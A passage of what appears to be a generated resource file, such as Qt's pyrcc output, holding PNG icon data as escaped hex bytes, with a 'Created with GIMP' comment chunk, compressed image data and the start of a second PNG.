xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0b\\x13\\x00\\x00\\\n\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe5\\x03\\x1d\\x15\\x2c\\x22\\x99\\x32\\x9e\\xd2\\x00\\x00\\x00\\x1d\\x69\\x54\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x00\\x00\\x00\\x00\\x43\\x72\\\n\\x65\\x61\\x74\\x65\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x64\\\n\\x2e\\x65\\x07\\x00\\x00\\x0b\\xbf\\x49\\x44\\x41\\x54\\x78\\xda\\xed\\x9b\\x6b\\\n\\x70\\x5c\\xe5\\x79\\xc7\\x7f\\xef\\x39\\x67\\x6f\\x67\\xb5\\xd2\\xae\\xee\\xf7\\\n\\xab\\x65\\x4b\\xb2\\xe5\\x38\\xb6\\x7c\\xc3\\x36\\xd8\\x90\\x3a\\x71\\x8d\\xb1\\\n\\x09\\x85\\x96\\x26\\x69\\x42\\x4b\\x26\\x61\\xca\\x74\\x9a\\xe6\\x53\\x67\\x3a\\\n\\x93\\xe6\\x43\\xa6\\x5f\\x98\\x66\\xda\\x14\\x32\\xcc\\x90\\xb6\\x13\\x06\\x53\\\n\\xc8\\x85\\x34\\x01\\x1c\\xdb\\x60\\x8c\\x03\\x83\\x21\\x10\\x2c\\xd9\\x51\\x64\\\n\\xd9\\x92\\x25\\xad\\xee\\xd2\\xee\\xea\\xb2\\xda\\xb3\\xb7\\x73\\xde\\x7e\\x58\\\n\\x5b\\xb2\\xb0\\x90\\x64\\xdd\\x90\\x68\\xde\\x4f\\xbb\\xe7\\x9c\\x7d\\xf7\\xfd\\\n\\xff\\xdf\\xe7\\x79\\xfe\\xcf\\xfb\\xbc\\xef\\x81\\x3f\\xb6\\xff\\xdf\\x4d\\xac\\\n\\xe4\\x9f\\x9d\\xa8\\xca\\x92\\xb7\\xf3\\xfc\\xa1\\xb6\\x80\\x58\\xd3\\x04\\xdc\\\n\\x2e\\xe0\\x4f\\x82\\x0c\\xb1\\x9a\\x41\\xaf\\x04\\x19\\x4b\\xd6\\xd1\\xa9\\xc7\\\n\\x1f\\x5d\\x6f\\x9e\\x78\\xe9\\xf2\\x4a\\xba\\xd4\\x52\\x10\\x21\\xd6\\xca\\xac\\\n\\x2f\\x17\\x11\\x62\\x2d\\x03\\x5f\\x0a\\x12\\xc4\\xa7\\x01\\xfc\\x62\\x88\\x10\\\n\\x9f\\x26\\xf0\\x0b\\x21\\x61\\xd6\\x07\\x23\\x91\\x88\\x00\\xd0\\x75\\x5d\\xae\\\n\\x15\\xf0\\xb7\\x4b\\x82\\x98\\x09\\xf0\\x47\\x41\\xaf\\x35\\xf0\\xb7\\x43\\x82\\\n\\x98\\x0f\\xf0\\xb5\\x08\\x7e\\xbe\\x24\\x68\\xb3\\x81\\x5e\\x95\\xe0\\x9d\\x2e\\\n\\x88\\x1a\\x2b\\x97\\x09\\xae\\x16\\xf0\\x5a\\x6d\\x3d\\x69\\x7b\\x0f\\x90\\x30\\\n\\x0c\\x26\\xde\\x38\\x09\\x3d\\x5d\\x4b\\x62\\x05\\xca\\x6a\\x35\\x5d\\x4b\\xb3\\\n\\x61\\x89\\xd4\\xb8\\xa5\\x66\\xc3\\x59\\x5d\\x43\\xe5\\x43\\x5f\\xa2\\xec\\xd8\\\n\\x83\\x28\\xb9\\xf9\\x58\\x4a\\x6a\\xe8\\x96\\xa2\\x20\\x6d\\xf6\\x05\\x4f\\xa2\\\n\\xb6\\x1a\\x67\\x3f\\x51\\xb1\\x1e\\x51\\x5a\\x8e\\xb3\\xad\\x85\\xc4\\xf0\\x20\\\n\\xae\\xa2\\x52\\x72\\xf7\\x1d\\xc0\\x5b\\x54\\x42\\x2c\\xc3\\x4b\\xc6\\x1d\\x77\\\n\\x31\\xd8\\xd9\\x8e\\x34\\x0c\\x1c\\xa5\\xe5\\x44\\x8a\\xca\\x50\\x5b\\x2e\\xa2\\\n\\xf6\\xfa\\x6f\\xdf\\xb2\\x56\\x1b\\x78\\x2b\\xc3\\x87\\xed\\xee\\x43\\x54\\xdd\\\n\\x7b\\x14\\xb5\\xb9\\x91\\xc1\\x0b\\x1f\\x50\\xb0\\x77\\x3f\\xde\\xdd\\xfb\\x50\\\n\\x14\\x05\\x9b\\x4b\\xa7\\xf4\\xd8\\x43\\xb8\\x7c\\x99\\x84\\xaf\\xb4\\x50\\xbc\\\n\\xff\\x1e\\x82\\x39\\x85\\x74\\xfe\\xf7\\xd3\\x10\\x18\\x42\\x8d\\x45\\x3f\\x16\\\n\\xcf\\x4c\\xae\\xa0\\xad\\x3a\\xdb\\x1f\\x1d\\x21\\xd3\\xdf\\x46\\x75\\xfd\\x66\\\n\\xa8\\xdf\\x4c\\xc1\\x17\\x8e\\xe0\\xca\\xf0\\x4e\\xde\\x56\\x55\\x95\\x82\\x8a\\\n\\x0a\\x0a\\x2a\\xbe\\x8e\\x31\\x32\\x82\\xcb\\xeb\\xc5\\xf1\\xe1\\xfb\\x04\\x83\\\n\\x43\\x18\\xc9\\xe4\\x9c\\xae\\xf0\\x51\\x12\\x94\\xe5\\x9c\\xfd\\x85\\x74\\x22\\\n\\x04\\xf4\\x35\\x5f\\xe2\\xfc\\x89\\x57\\x88\\xc5\\x62\\x38\\xd3\\x33\\x90\\x96\\\n\\x45\\x74\\x24\\xc4\\x58\\xb7\\x9f\\x89\\xfe\\x3e\\x92\\xb1\\x18\\xa6\\x69\\xe2\\\n\\xf2\\x7a\\x89\\x8e\\x84\\x18\\x38\\x77\\x86\\x64\\x73\\x13\\x8a\\x99\\x5c\\x3a\\\n\\x17\\x58\\x12\\x02\\x54\\x15\\x61\\x9a\\xd7\\x3f\\x6b\\x88\\x79\\x0c\\x50\\x48\\\n\\x89\\xa3\\xbb\\x83\\xf2\\xf5\\x1b\\xb0\\xdb\\xed\\x08\\x21\\x40\\x08\\xda\\x7f\\\n\\xf4\\x14\\x63\\x97\\x1a\\xc1\\x4c\\x92\\xfd\\xc5\\x87\\x59\\x77\\xec\\xc1\\x94\\\n\\x2a\\x7a\\x7d\\xb8\\x8b\\x4a\\xb0\\x46\\x82\\xc8\\x79\\xc8\\xda\\x47\\xad\\x60\\\n\\xd9\\x08\\xb0\\x84\\x42\\xf0\\x1f\\xbe\\x4b\\x89\\xdb\\x89\\x22\\x14\\x42\\x8a\\\n\\x86\\xf6\\x9d\\xbf\\x47\\xb1\\xac\\x8f\\xff\\x51\\x7e\\x21\\xb6\\xbc\\x42\\xf2\\\n\\xee\\x7f\\x08\\x6f\\x7e\\x01\\x96\\x65\\x11\\x1b\\x1e\\xa4\\xed\\x99\\x27\\xe9\\\n\\x7a\\xe1\\x59\\xd4\\x78\\x9c\\xa4\\x10\\xf4\\x74\\x76\\x92\\x88\\xc7\\xa9\\xbe\\\n\\xef\\x01\\x84\\xa6\\xe1\\xdd\\xb5\\x8f\\xac\\x6f\\x7e\\x8b\\xc0\\xeb\\xbf\\xc6\\\n\\x0a\\x06\\x50\\x02\\x83\\x0b\\xb7\\x80\\x25\\x0b\\x7e\\x19\\x5e\\x76\\x16\\xe4\\\n\\x50\\x78\\xe0\\x20\\x42\\x08\\x06\\xce\\x9d\\xa1\\xd5\\x97\\x85\\x0c\\x0c\\xcd\\\n\\xf8\\xb8\\xad\\xb0\\x84\\x9c\\x47\\x1e\\x23\\xfb\\x33\\x9f\\x25\\xad\\x62\\x1d\\\n\\xaa\\xdd\\x8e\\x95\\x4c\\x12\\x68\\xbe\\x44\\xe0\\xdc\\x19\\x14\\x23\\x02\\x52\\\n\\xa2\\x01\\xd6\\x40\\x2f\\xc1\\xd3\\xaf\\x12\\xd9\\xb6\\x03\\x4f\\xe5\\x3a\\xdc\\\n\\x59\\x59\\x54\\xff\\xd5\\xd7\\xc9\\xda\\xb9\\x07\\xff\\x99\\x53\\x18\\x2f\\xfd\\\n\\x0f\\x84\\xc7\\xe6\\x35\\xcc\\x45\\xe7\\x01\\x11\\x87\\x6b\\xc6\\xeb\\x1d\\xbe\\\n\\x5c\\xc6\\xf2\\x8b\\x71\\x7b\\x3c\\xe8\\x69\\x69\\x44\\xca\\xaa\\xb8\\xe0\\xcb\\\n\\x9f\\xf6\\x8c\\x29\\x25\\xa6\\x94\\x18\\x4e\\x9d\\x44\\xaf\\x9f\\xb2\\x23\\x5f\\\n\\xa4\\x70\\xeb\\x76\\xd2\\x7d\\x3e\\x6c\\x36\\x1b\\x42\\x55\\x09\\xdb\\x9d\\xc4\\\n\\x87\\x07\\x11\\x72\\x6a\\x5e\\xec\\xc9\\x04\\xd6\\x40\\x2f\\x5a\\x41\\x11\\x42\\\n\\x08\\x9c\\x2e\\x17\\xde\\xdc\\x5c\\x2a\\xf6\\xde\\x45\\xfa\\x96\\x86\\x39\\xc1\\\n\\xdf\\x3c\\xc9\\x8b\\x72\\x81\\x50\\x59\\x35\\xcd\\x77\\x7c\\x8e\\xbb\\xbb\\x5a\\\n\\x88\\xbd\\xfd\\xc6\\xb4\\x7b\\xa5\\xde\\x74\\xb2\\xbd\\xbe\\xc9\\xef\\x75\\x75\\\n\\x75\\x0c\\xe5\\xe7\\x10\\xbd\\x3a\\xf5\\x8c\\x2a\\x04\\xca\\xce\\x7d\\x5c\\xa8\\\n\\x6b\\x60\\x6b\\x6b\\x23\\x4d\\x4f\\xfe\\x2b\\xce\\xa2\\x12\\x2a\\xee\\x3c\\x40\\\n\\x46\\x79\\x25\\x9a\\xcd\\x46\\xae\\x27\\x8d\\x50\\xcd\\x26\\x46\\xce\\xff\\x06\\\n\\x45\\x08\\xa4\\x94\\x98\\x42\\x41\\x5f\\x5f\\x8b\\x35\\x3c\\x88\\x2c\\x29\\x23\\\n\\x1a\\x89\\x10\\xba\\xd4\\x48\\xdf\\xb9\\x33\\x8c\\x5e\\xb9\\x0c\\x2e\\x17\\x18\\\n\\xf3\\x4b\\x97\\xd5\\x85\\x9a\\xff\\x68\\xf5\\x46\\x5c\\x0f\\x7e\\x85\\x7b\\xee\\\n\\x3b\\x4a\\xd9\\x9e\\x3b\\x91\\x46\\x84\\x70\\xb7\\x1f\\xcb\\xee\\x20\\x63\\xf7\\\n\\x3e\\x8a\\xff\\xe6\\x6f\\xc9\\xaf\\xad\\xc3\\x6e\\x4f\\x65\\x69\\x89\\x44\\x02\\\n\\xad\\xb0\\x84\\x44\\x28\\x80\\x31\\x34\\x84\\xb4\\x3b\\x28\\x38\\x7c\\x8c\\xca\\\n\\xc7\\xbf\\x4d\\xcd\\xd6\\x06\\xe2\\xbe\\x2c\\x02\\x6f\\xbe\\xc6\\xc4\\x89\\x5f\\\n\\x60\\x8c\\x84\\xf0\\x6d\\xda\\x8c\\x2d\\xcd\\x83\\x2b\\x27\\x17\\x2d\\x3d\\x9d\\\n\\xd8\\xe0\\x00\\x66\\x3c\\x8e\\xe2\\x76\\xe3\\xdb\\xb9\\x87\\xaa\\xaf\\x7d\\x83\\\n\\x8c\\xf5\\xb5\\x98\\xa6\\x49\\xb0\\xf1\\x77\\x74\\xfe\\xc7\\x13\\x04\\x4e\\xfc\\\n\\x2f\\x66\\x47\\x1b\\x22\\x1e\\x9b\\x73\\xfc\\xcf\\x85\\x8c\\xef\\x2e\\xc8\\x02\\\n\\x24\\x60\\x38\\x5c\\x34\\xef\\xd8\\xcf\\x63\\x47\\x8e\\x92\\x9f\\x9f\\x32\\xeb\\\n\\x9c\\x27\\x9e\\xe2\\xfc\\x4f\\x9e\\x27\\x6a\\x49\\x76\\x3f\\xf4\\x30\\xf1\\x78\\\n\\x1c\\x87\\xc3\\x31\\x65\\xb6\\x76\\x3b\\xf9\\x5b\\x1b\\x28\\xdb\\xfd\\x3c\\xaf\\\n\\x3f\\xf7\\x63\\x1c\\xaa\\xca\\x96\\xbf\\xf8\\xd2\\xe4\\x7d\\x9f\\xcf\\xc7\\xcb\\\n\\xe1\\x08\\xde\\x3f\\x5c\\xe4\\xe2\\x4f\\x8e\\x63\\xdb\\x73\\x37\\xdb\\x4b\\xca\\\n\\x00\\x28\\x38\\x78\\x98\\xf4\\xf5\\x35\\x5c\\x7b\\xf7\\x1d\\x1c\\x40\\xc5\\x91\\\n\\xfb\\xb1\\xb9\\xd3\\x52\\x3e\\x2c\\x04\\x97\\x5f\\x7a\\x91\\xe8\\x3b\\xe7\\x16\\\n\\x54\\xdd\\xb9\\x6d\\x02\\x04\\xe0\\x8a\\x19\\xdc\\xd5\\xd5\\x82\\x6d\\x34\\x88\\\n\\xcc\\xcb\\x4b\\x49\\x15\\xb0\\xf9\\xf0\\xd1\\xeb\\x5a\\x2e\\xa6\\x81\\xbf\\xd1\\\n\\x6e\\x5c\\xdb\\x7d\\xff\\x9f\\x21\\x6f\\xf2\\x69\\x29\\x25\\x4a\\x70\\x98\\x8a\\\n\\xb7\\x4f\\x33\\x1e\\x35\\xa8\\xbb\\x63\\x1f\\x45\\xc5\\xc5\\x29\\x35\\x49\\x24\\\n\\x90\\x8a\\x82\\xbb\\xbc\\x8a\\xaa\\xec\\x3c\\x04\\xa0\\xe9\\x6e\\x4c\\xd3\\xc4\\\n\\x34\\x4d\\x14\\xcb\\xa4\\x74\\xfb\\x2e\\x3a\\x3e\\x38\\x4f\\xb4\\xb3\\x7d\\x76\\\n\\x95\\x99\\x41\\x0e\\x17\\x14\\x04\\x05\\x10\\x7b\\xeb\\x0c\\x5d\\xcf\\x3c\\xc9\\\n\\x44\\xf7\\xd4\\xaa\\x4c\\xd7\\x75\\x74\\x5d\\x9f\\xf3\\xf7\\xba\\xae\\xe3\\x76\\\n\\xbb\\xa7\\xdc\\xa9\\xaf\\x97\\x4b\\xcf\\x3c\\x45\\xf8\\xcc\\xaf\\x51\\x7c\\x99\\\n\\x78\\x0e\\x1e\\xc6\\x5b\\xb7\\x89\\xb1\\xab\\xad\\xf4\\xbd\\x75\\x96\\x48\\x7f\\\n\\x1f\\x66\\x32\\x89\\xee\\xf1\\xe0\\xf2\\x78\\x48\\xc4\\x62\\x04\\xae\\xb5\\xf3\\\n\\xfb\\xf7\\xce\\x13\\x09\\x85\\xf0\\x6c\\xbf\\x03\\x65\\xdb\\x2e\\x98\\x63\\x51\\\n\\xb4\\xa4\\x89\\x90\\x65\\x59\\x5c\\x3b\\x75\\x82\\xc4\\xd6\\x5d\\x6c\\x3a\\xfa\\\n\\xc0\\x2d\\xc0\\x13\\x89\\x04\\x9a\\xa6\\x11\\x09\\x05\\x53\\xa0\\x7d\\x99\\x24\\\n\\x93\\x49\\x6c\\x36\\xdb\\x2d\\x7d\\x5d\\x6c\\x6b\\xe7\\x95\\xe7\\x8f\\xb3\\x5f\\\n\\xb3\\xc0\\x88\\x30\\xe6\\xf7\\xd3\\x76\\xfa\\x04\\xb1\\x37\\x4f\\x33\\x70\\xa9\\\n\\x09\\xef\\xb6\\x9d\\xd4\\x3c\\xf2\\x0d\\xbc\\x95\\xeb\\x88\\xc5\\x62\\xf4\\xbd\\\n\\xf3\\x16\\x03\\x3f\\x3b\\x4e\\x6f\\x67\\x07\\xc9\\x2d\\xdb\\x90\\xf5\\x9f\\x25\\\n\\xd6\\xd7\\x83\\x92\\x88\\xaf\\x0c\\x01\\x52\\x4a\\xa2\\x96\\xa4\\x3b\\x69\\xa1\\\n\\x27\\xcc\\x5b\\xee\\x8f\\x05\\x03\\x34\\x5f\\xbc\\x84\\xbd\\xe3\\x0a\\x34\\x37\\\n\\xa5\\x24\\x6f\\xc3\\x46\\x28\\x2c\\x61\\xe3\\xb6\\x06\\xf4\\x9c\\xdc\\xc9\\x67\\\n\\xe3\\xf1\\x38\\x39\\xe3\\x21\\xf6\\xe6\\x78\\x21\\x14\\x40\\x86\\xc7\\x31\\x7e\\\n\\x7e\\x9c\\xe8\\xd9\\x53\\x98\\x03\\x3d\\xc8\\x68\\x8c\\x40\\x6f\\x37\\x57\\xb2\\\n\\x73\\xa9\\xff\\xeb\\x6f\\x12\\x0b\\x05\\xe8\\xf9\\xe9\\x71\\x26\\x5e\\x7b\\x05\\\n\\xb7\\xaa\\x12\\xe8\\x6a\\x87\\xb7\\xde\\x40\\x0e\\xf6\\x21\\xe6\\x69\\xfe\\x8b\\\n\\x26\\x20\\x2a\\x04\\xe3\\x96\\x45\\xe6\\xb6\\x1d\\xd4\\xef\\xd8\\x31\\x6d\\xf6\\\n\\xc7\\x03\\x01\\xde\\x7c\\xf6\\xbf\\xb8\\xf6\\xfa\\x49\\xca\\x87\\x7a\\xb1\\x0f\\\n\\x0f\\xa4\\x2c\\xc2\\x97\\x8d\\xd4\\xdd\\x78\\x3e\\xff\\xa7\\x94\\x3e\\xfa\\x38\\\n\\x7a\\x6e\\xde\\x64\\x70\\x2c\\xdc\\x50\\x4b\\xb8\\x61\\x27\\xc3\\xa7\\x5f\\x25\\\n\\x29\\x04\\xda\\xf8\\x28\\xd6\\xd8\\x08\\x42\\x08\\x34\\xc0\\x34\\x93\\x8c\\x5e\\\n\\xbb\\x4a\\xe0\\xca\\x65\\x8c\\xe1\\x21\\x0c\\x7f\\x27\\x08\\x91\\x4a\\xb3\\x4d\\\n\\x03\\x7a\\xfd\\x0b\\xae\\xef\\xdf\\x16\\x01\\x96\\x3b\\x0d\\x61\\x77\\xd0\\xe3\\\n\\xcb\\x25\\xbb\\xa2\\x8a\\xba\\x3f\\xff\\x32\\x59\\xe5\\x95\\xd3\\xcc\\xbe\\xf9\\\n\\x62\\x13\\x3d\\x27\\x5f\\x26\\xbf\\xbd\\x05\\xfb\\x4d\\xb9\\xbf\\x2d\\x34\\x0c\\\n\\xa1\\x61\\x2e\\xfe\\xea\\x25\\x7a\\xab\\x37\\xb1\\xe7\\xbe\\x63\\x93\\x41\\xd1\\\n\\x5d\\x5e\\x49\\xde\\x23\\x8f\\x31\\xac\\xda\\xe9\\xb9\\x7a\\x85\\xd2\\x40\\x3f\\\n\\x22\\x99\\x80\\xf1\\x54\\x42\\xa3\\x26\\xe2\\xa8\\xbf\\x7b\\x97\\xae\\xbe\\x6e\\\n\\x92\\x89\\x04\\x74\\x77\\x4c\\x4b\\x8c\\x16\\x55\\x69\\x02\\x30\\x0c\\x43\\xb8\\\n\\x5c\\xae\\x59\\x7b\\x94\\x6e\\x0f\\xea\\xc1\\x7b\\xa9\\xdc\\x77\\x80\\xfc\\x82\\\n\\x12\\x32\\xbd\\x19\\x64\\x15\\x14\\xe2\\x74\\x3a\\xa7\\x3a\\xd3\\x34\\x6c\\x9d\\\n\\x6d\\x14\\x06\\x07\\xa7\\x81\\x9f\\x96\\x78\\x18\\x06\\xea\\x40\\x2f\\x9a\\xa6\\\n\\x21\\xa5\\x44\\x08\\x81\\xaa\\xaa\\x64\\xd7\\x6f\\xe1\\x4f\\xfe\\xed\\x69\\x3e\\\n\\xfc\\xf0\\x43\\xca\\x63\\x13\\x5c\\x9e\\x88\\x32\\xf6\\x77\\x5f\\x45\\x5c\\x5f\\\n\\xe2\\x26\\x07\\xfb\\x09\\x0f\\xf6\\x2f\\x7d\\xa9\\xed\\xc6\\x87\\x9e\\x9e\\x1e\\\n\\xd1\\x74\\xe7\\xe6\\x59\\x56\\x69\\x16\\x9e\\x0d\\x1b\\x29\\xba\\xfb\\x20\\x4e\\\n\\x5d\\x47\\x51\\x6e\\x15\\x90\\x48\\x28\\x08\\xcd\\x4d\\xd8\\x67\\x59\\x8c\\xe8\\\n\\xe1\\x51\\xd4\\xcb\\x97\\x18\\xe9\\xef\\x23\\xab\\xa8\\x78\\xf2\\xba\\xcb\\x95\\\n\\x4a\\xa9\\x1b\\x1a\\x1a\\x52\\x71\\xe4\\xec\\xeb\\x8c\\x27\\x93\\x2c\\x77\\x53\\\n\\xae\\xff\\xb9\\x2c\\x2a\\x2a\\x9a\\xd3\\xa6\\xae\\xcb\\xfd\\xa4\\xee\\x2f\\x46\\\n\\x41\\xac\\x8f\\x09\\x58\\x52\\x4a\\xe2\\xb1\\x18\\x72\\x7c\\x14\\x2d\\x3d\\x63\\\n\\xf9\\x8b\\xad\\xf3\\x8e\\xfc\\x42\\x21\\x72\\xe5\\x32\\xfd\\x6f\\xbe\\x46\\xac\\\n\\xb4\\x0a\\x5f\\x46\\x3a\\xbe\\xbc\\xfc\\x69\\x09\\x8f\\xcb\\xeb\\x23\\x51\\x5d\\\n\\x4b\\xdc\\x9b\\x85\\x7d\\x24\\x30\\x73\\x00\\x75\\x38\\x71\\x16\\x96\\xe2\\xc9\\\n\\xc9\\x9d\\x74\\x01\\x80\\x64\\x32\\xc9\\xe8\\xd0\\x20\\x23\\xe3\\x61\\x8c\\x1e\\\n\\x3f\\xe1\\xd6\\x16\\xa4\\x50\\x56\\x0f\\x01\\x62\\x62\\x9c\\xd8\\xcf\\x9f\\xa3\\\n\\xf5\\xa7\\xcf\\xf2\\x41\\x59\\x0d\\xbb\\x0a\\xf3\\xa8\\xfe\\xde\\xf7\\x29\\x28\\\n\\x28\\x98\\xd4\\x76\\x21\\x04\\x81\\xc2\\x32\\x62\\x81\\x21\\xec\\xea\\xcc\\x83\\\n\\xb7\\x45\\x0d\\x06\\x9c\\xee\\x69\\xb1\\xe3\\x06\\x01\\xcd\\xff\\xf4\\x6d\\x9a\\\n\\x46\\xc6\\x89\\xbd\\xfb\\x1b\\x2a\\xd3\\xd3\\x70\\xce\\x23\\xa7\\x5f\\xec\\x86\\\n\\xc9\\xb4\\xc5\\xd0\\x97\\x33\\xf5\\x7f\\x9e\\xab\\x5a\\x03\\x90\\x37\\x1e\\x44\\\n\\xfa\\x3b\\x48\\x74\\x5d\\xc3\\x53\\xbb\\x09\\x57\\x76\\xce\\x24\\x01\\x45\\xde\\\n\\x0c\\x9c\\x48\\x7a\\x7a\\x7a\\x30\\x15\\x0d\\x5b\\x3c\\x55\\xa4\\x9c\\x70\\xb9\\\n\\x31\\xdc\\x1e\\x36\\xfc\\xe5\\xd7\\xd8\\xfe\\xd5\\x47\\xb1\\xb9\\xd3\\x26\\x67\\\n\\xbf\\xdf\\xdf\\xc5\\x7b\\xff\\xf2\\x1d\\xe2\\x27\\x7f\\x89\\x77\\xa8\\x8f\\x2c\\\n\\x05\\xec\\x96\\xb9\\xac\\x33\\x3f\\xe3\\x62\\xe8\\x50\\x5b\\x40\\xcc\\x67\\x45\\\n\\xa8\\x5e\\xf7\\xdf\\xe1\\xf7\\xde\\x81\\xf7\\x7f\\xcb\\xe6\\x92\\xf2\\xc9\\x5c\\\n\\x40\\xcf\\xc9\\xa5\\xf4\\xd1\\xc7\\xe9\\xaf\\xf9\\x0c\\xa2\\xd7\\x8f\\xf8\\x43\\\n\\x2a\\x11\\x52\\x4b\\xab\\x90\\x79\\x85\\x94\\x1e\\x3a\\x84\\x3b\\x37\\x7f\\x12\\\n\\x7c\\x22\\x91\\xe0\\x6a\\x7b\\x3b\\x2d\\x8d\\x8d\\x54\\x0a\\x05\\xcd\\x32\\xa7\\\n\\x82\\xcd\\x4a\\x6c\\xb8\\x2c\\x6a\\x5b\\x49\\x80\\x3a\\x83\\x1a\\xe8\\xb9\\x79\\\n\\xec\\x3e\\x7c\\x04\\x55\\x55\\x19\\xe9\\xef\\x43\\x4a\\x49\\x7a\\x6e\\x1e\\x96\\\n\\x69\\xe2\\x74\\xb9\\xa6\\x05\\x51\\x29\\x25\\x05\\x46\\x98\\x75\\xa3\\x43\\x28\\\n\\xd2\\x5a\\x11\\xd0\\x37\\xd7\\x04\\x17\\x15\\x65\\x8a\\xee\\xfa\\x1c\\xdb\\x1f\\\n\\xfe\\xca\\x8c\\x0b\\x20\\x87\\xc3\\x81\\xa6\\x69\\x64\\x17\\x97\\x90\\x53\\x52\\\n\\x8a\\xc3\\xe1\\xc0\\xa5\\xeb\\xb7\\x28\\x88\\xdd\\x6e\\xa7\\xea\\x0b\\xf7\\x52\\\n\\xb8\\x7b\\xef\\x27\\x52\\x85\\x57\\x66\\x63\\x67\\xd6\\xd9\\xdf\\xbe\\x87\\x75\\\n\\xdf\\xfb\\xfe\\x92\\x0d\\x64\\xe3\\x13\\x3f\\x24\\x6d\\xff\\xe7\\x57\\x9c\\x80\\\n\\x05\\xb9\\x40\\xd8\\xa9\\x13\\x28\\x28\\xa7\\xd4\\xef\\xa7\\xb6\\xb6\\x16\\x29\\\n\\x25\\xa1\\xbe\\x5e\\x2e\\xb7\\xb4\\x90\\x15\\x8b\\x90\\xbf\\xbe\\x86\\xb4\\x8a\\\n\\xaa\\x5b\\x92\\x25\\x29\\x25\\x03\\xdd\\x7e\\x5a\\xaf\\xb6\\x91\\x11\\x33\\xa8\\\n\\xd8\\x54\\x8f\\xa7\\xa8\\x18\\x21\\x04\\xc1\\x60\\x10\\x63\\xcb\\x0e\\x92\\x17\\\n\\x7e\\x8b\\x36\\x12\\x5c\\x31\\x02\\xd4\\x99\\x2e\\xce\\xa5\\x06\\xf6\\x64\\x02\\\n\\x4c\\x8b\\x70\\x46\\x26\\xb6\\x0c\\x1f\\x6a\\x68\\x98\\xdf\\x3f\\xfd\\xef\\x34\\\n\\x3d\\xfb\\x9f\\x98\\xa7\\x5e\\x26\\xde\\xd9\\x0e\\x79\\x45\\x68\\xbe\\xcc\\x49\\\n\\x89\\x4c\\x26\\x93\\x84\\x9a\\x2f\\x72\\xe1\\xe9\\x1f\\xd0\\xf8\\xb3\\x17\\x08\\\n\\x9f\\xfc\\x25\\xb2\\xbf\\x97\\xb4\\xca\\x75\\x8c\\x25\\x4d\\xfa\\x9a\\x1a\\x09\\\n\\xff\\xea\\x45\\x94\\xb6\\xd6\\x15\\xf3\\x7f\\x66\\xdb\\x47\\x98\\x8f\\x1a\\x84\\\n\\x6b\\x36\\x63\\xee\\xdc\\x47\\xbe\\xbf\\x0d\\xe3\\xec\\x29\\x92\\x96\\x44\\xbb\\\n\\xbe\\x1f\\x64\\x1d\\xbc\\x8f\\x4d\\xdf\\xfa\\x47\\x4a\\xab\\xab\\x01\\x08\\xf4\\\n\\xf5\\xd2\\xf2\\x83\\x27\\x18\\x7f\\xf1\\xc7\\x24\\x85\\x82\\xb0\\x4c\\x14\\x45\\\n\\xc1\\x73\\xcf\\x21\\xa2\\xf5\\xdb\\x30\\xdf\\x3e\\x83\\x7c\\xef\\xed\\x15\\x0d\\\n\\x80\\xb3\\xba\\xc0\\x7c\\x24\\x31\\xad\\xa5\\x89\\x68\\x77\\x07\\x91\\xf0\\x58\\\n\\xaa\\x54\\x75\\x23\\xa9\\x11\\x82\\xae\\x2b\\xad\\xe4\\x85\\x82\\x14\\x5b\\x16\\\n\\x42\\x08\\xc6\\x26\\x22\\xf4\\xfa\\xfd\\xb8\\x15\\x75\\x4a\\xea\\xa4\\x64\\xfc\\\n\\xb5\\x57\\x31\\xdf\\x3f\\xbf\\x22\\x66\\xbf\\x2c\\x9b\\xa3\\xce\\x19\\x6a\\xf0\\\n\\x9a\\x94\\x54\\x8c\\x0c\\x91\\x15\\x18\\xc0\\x4c\\x24\\x40\\x08\\xc6\\x7b\\xfc\\\n\\x84\\xfd\\x1d\\xb8\\x3f\\x92\\xe0\\x08\\xf8\\xc4\\xc0\\xcf\\x49\\xc0\\x7c\\x13\\\n\\xa3\\x19\\x55\\x22\\x99\\xa0\\xef\\xfd\\x77\\x49\\xc4\\xe3\\x68\\xaa\\xc6\\x44\\\n\\x6b\\x0b\\x19\\xc6\\xc4\\xaa\\x3b\\x91\\xb1\\xac\\x47\\x64\\x84\\x27\\x03\\x55\\\n\\x4c\\x2d\\xa6\\xcc\\xd1\\xd0\\x27\\x02\\x72\\x36\\x69\\x9f\\x97\\xe6\\xaf\\xd5\\\n\\x13\\x62\\xf3\\xc9\\x6b\\x94\\xa5\\xe8\\x64\\xb5\\x36\\xf5\\xf0\\x03\\x0d\\x8b\\\n\\x76\\x81\\xb5\\x6c\\x09\\xf3\\x99\\x38\\x65\\xa9\\x3b\\xbc\\xa5\\xfa\\x23\\xe5\\\n\\xb4\\x5d\\xa0\\xd5\\x04\\x7e\\x41\\x8b\\xa1\\x15\\x39\\x8d\\xbd\\x88\\x26\\x4b\\\n\\x2a\\x7e\\xb4\\x64\\x87\\xa5\\xd7\\x9a\\x3b\\x14\\xff\\xe2\\xac\\x52\\x5f\\x5f\\\n\\x3f\\xaf\\x71\\x45\\x22\\x11\\xa1\\xeb\\xba\\xfc\\xd4\\xbc\\x30\\xd1\\x70\\xbe\\\n\\x45\\xf1\\x7a\\xbd\\xd8\\x6c\\x36\\x39\\x17\\xf0\\x1b\\xd6\\xaf\\xeb\\xba\\xb9\\\n\\xe6\\x5f\\x99\\xc9\\x79\\xe1\\xa4\\x52\\x57\\x57\\x37\\x55\\x8c\\x99\\xe3\\xdc\\\n\\x73\\x24\\x12\\x51\\x48\\xed\\xf2\\x0b\\x5d\\xd7\\xad\\x25\\x75\\xd1\\x95\\x26\\\n\\xe2\\x76\\xe3\\xd1\\xcd\\xa7\\xe2\\x6f\\x90\\xb5\\x2c\\x31\\x6a\\xb9\\x89\\x58\\\n\\x95\\xaf\\xcd\\x2d\\x37\\x19\\x6b\\xe6\\xc5\\xc9\\xa5\\x22\\x63\\xad\\x66\\x9f\\\n\\x7f\\x6c\\x6b\\xad\\xfd\\x1f\\xa9\\x38\\xfd\\xe2\\x14\\x91\\x34\\x14\\x00\\x00\\\n\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x06\\xaf\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x4